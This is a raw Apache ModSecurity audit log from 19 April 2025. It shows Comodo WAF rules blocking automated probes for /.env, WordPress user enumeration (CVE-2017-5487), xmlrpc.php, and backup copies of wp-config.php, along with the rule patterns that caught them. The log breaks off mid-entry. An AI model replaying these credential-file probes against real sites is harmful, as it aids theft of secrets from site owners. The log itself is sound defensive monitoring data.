OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d220555-Z-- --68e3fa6d-A-- [19/Apr/2025:02:20:37 +0700] aAKmBVyj-eUTITfvHEXy0QAAABg 103.236.140.4 45304 103.236.140.4 8181 --68e3fa6d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --68e3fa6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e3fa6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745004037230007 725 (- - -) Stopwatch2: 1745004037230007 725; combined=292, p1=260, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e3fa6d-Z-- --5603a760-A-- [19/Apr/2025:03:35:04 +0700] aAK3eA6cTFSgLAHl7PpLmwAAABY 103.236.140.4 34028 103.236.140.4 8181 --5603a760-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5603a760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5603a760-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745008504452628 3592 (- - -) Stopwatch2: 1745008504452628 3592; combined=1533, p1=472, p2=1029, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5603a760-Z-- --3ad2de73-A-- [19/Apr/2025:03:35:06 +0700] aAK3euvDiFC_ir7MDwZxygAAAEc 103.236.140.4 34040 103.236.140.4 8181 --3ad2de73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ad2de73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ad2de73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745008506667902 2745 (- - -) Stopwatch2: 1745008506667902 2745; combined=1190, p1=418, p2=743, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ad2de73-Z-- --79e8d706-A-- [19/Apr/2025:03:35:08 +0700] aAK3fHNa4dA2HllpK_MEbwAAAI8 103.236.140.4 34052 103.236.140.4 8181 --79e8d706-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79e8d706-C-- demo.sayHello --79e8d706-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79e8d706-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745008508883090 5297 (- - -) Stopwatch2: 1745008508883090 5297; combined=3972, p1=558, p2=3187, p3=22, p4=24, p5=103, sr=113, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79e8d706-Z-- --05183e58-A-- [19/Apr/2025:03:35:23 +0700] aAK3iw6cTFSgLAHl7PpLogAAAAs 103.236.140.4 34112 103.236.140.4 8181 --05183e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --05183e58-C-- demo.sayHello --05183e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --05183e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745008523416916 7233 (- - -) Stopwatch2: 1745008523416916 7233; combined=5151, p1=644, p2=4222, p3=39, p4=45, p5=116, sr=104, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05183e58-Z-- --b138ab1a-A-- [19/Apr/2025:03:36:24 +0700] aAK3yOvDiFC_ir7MDwZx4AAAAEI 103.236.140.4 34344 103.236.140.4 8181 --b138ab1a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.203.68.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.203.68.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b138ab1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b138ab1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745008584268601 793 (- - -) Stopwatch2: 1745008584268601 793; combined=329, p1=290, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b138ab1a-Z-- --40da686e-A-- [19/Apr/2025:03:48:17 +0700] aAK6kXNa4dA2HllpK_MFAAAAAJg 103.236.140.4 37042 103.236.140.4 8181 --40da686e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --40da686e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40da686e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745009297570585 807 (- - -) Stopwatch2: 1745009297570585 807; combined=358, p1=321, p2=0, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40da686e-Z-- --9c011c6d-A-- [19/Apr/2025:03:57:57 +0700] aAK81evDiFC_ir7MDwZzPgAAAFQ 103.236.140.4 39270 103.236.140.4 8181 --9c011c6d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9c011c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c011c6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745009877991666 736 (- - -) Stopwatch2: 1745009877991666 736; combined=302, p1=262, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c011c6d-Z-- --4567ba71-A-- [19/Apr/2025:04:51:44 +0700] aALJcA6cTFSgLAHl7PpRzwAAABU 103.236.140.4 56150 103.236.140.4 8181 --4567ba71-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.118.228 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.118.228 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4567ba71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4567ba71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745013104446393 785 (- - -) Stopwatch2: 1745013104446393 785; combined=330, p1=292, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4567ba71-Z-- --10a3e15e-A-- [19/Apr/2025:05:37:31 +0700] aALUK-vDiFC_ir7MDwZ7JAAAAEM 103.236.140.4 41658 103.236.140.4 8181 --10a3e15e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.106.215 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.106.215 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --10a3e15e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10a3e15e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745015851816529 797 (- - -) Stopwatch2: 1745015851816529 797; combined=336, p1=296, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10a3e15e-Z-- --6abcc05c-A-- [19/Apr/2025:05:37:32 +0700] aALULEruoUXZj665VUF2tAAAAMg 103.236.140.4 41666 103.236.140.4 8181 --6abcc05c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.114.106.215 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.114.106.215 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --6abcc05c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6abcc05c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745015852475148 782 (- - -) Stopwatch2: 1745015852475148 782; combined=345, p1=310, p2=0, p3=0, p4=0, p5=34, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6abcc05c-Z-- --40a72670-A-- [19/Apr/2025:07:38:30 +0700] aALwhkruoUXZj665VUF9CAAAAMI 103.236.140.4 41298 103.236.140.4 8181 --40a72670-B-- GET /wp-config.php.web HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.70 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --40a72670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40a72670-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023110790605 898 (- - -) Stopwatch2: 1745023110790605 898; combined=359, p1=322, p2=0, p3=0, p4=0, p5=37, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40a72670-Z-- --db74bf33-A-- [19/Apr/2025:07:38:31 +0700] aALwh-vDiFC_ir7MDwaEhgAAAFY 103.236.140.4 41304 103.236.140.4 8181 --db74bf33-B-- GET /wp-config.php.sw HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.70 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --db74bf33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db74bf33-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023111672932 2522 (- - -) Stopwatch2: 1745023111672932 2522; combined=644, p1=580, p2=0, p3=0, p4=0, p5=64, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db74bf33-Z-- --3dd3bd76-A-- [19/Apr/2025:07:38:32 +0700] aALwiA6cTFSgLAHl7PpbfwAAAA4 103.236.140.4 41310 103.236.140.4 8181 --3dd3bd76-B-- GET /wp-config.php.old.bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --3dd3bd76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dd3bd76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023112565465 913 (- - -) Stopwatch2: 1745023112565465 913; combined=343, p1=301, p2=0, p3=0, p4=0, p5=41, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dd3bd76-Z-- --76f14b25-A-- [19/Apr/2025:07:38:33 +0700] aALwievDiFC_ir7MDwaEiAAAAEI 103.236.140.4 41316 103.236.140.4 8181 --76f14b25-B-- GET /wp-config.php.. HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --76f14b25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76f14b25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023113170188 837 (- - -) Stopwatch2: 1745023113170188 837; combined=325, p1=290, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76f14b25-Z-- --b69a1671-A-- [19/Apr/2025:07:38:33 +0700] aALwievDiFC_ir7MDwaEiQAAAEQ 103.236.140.4 41318 103.236.140.4 8181 --b69a1671-B-- GET /wp-config.php... HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --b69a1671-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b69a1671-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023113812527 664 (- - -) Stopwatch2: 1745023113812527 664; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b69a1671-Z-- --818a4f66-A-- [19/Apr/2025:07:38:34 +0700] aALwig6cTFSgLAHl7PpbgQAAAAo 103.236.140.4 41324 103.236.140.4 8181 --818a4f66-B-- GET /wp-config.php.old.backup HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.54 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --818a4f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --818a4f66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023114479477 961 (- - -) Stopwatch2: 1745023114479477 961; combined=409, p1=352, p2=0, p3=0, p4=0, p5=56, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --818a4f66-Z-- --91cf5d17-A-- [19/Apr/2025:07:38:35 +0700] aALwi-vDiFC_ir7MDwaEiwAAAFc 103.236.140.4 41326 103.236.140.4 8181 --91cf5d17-B-- GET /wp-config.php.antigo HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --91cf5d17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91cf5d17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023115122738 704 (- - -) Stopwatch2: 1745023115122738 704; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cf5d17-Z-- --aa31f70b-A-- [19/Apr/2025:07:38:35 +0700] aALwi-vDiFC_ir7MDwaEjQAAAEY 103.236.140.4 41332 103.236.140.4 8181 --aa31f70b-B-- GET /wp-config.php.oldd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* --aa31f70b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa31f70b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745023115724619 854 (- - -) Stopwatch2: 1745023115724619 854; combined=334, p1=296, 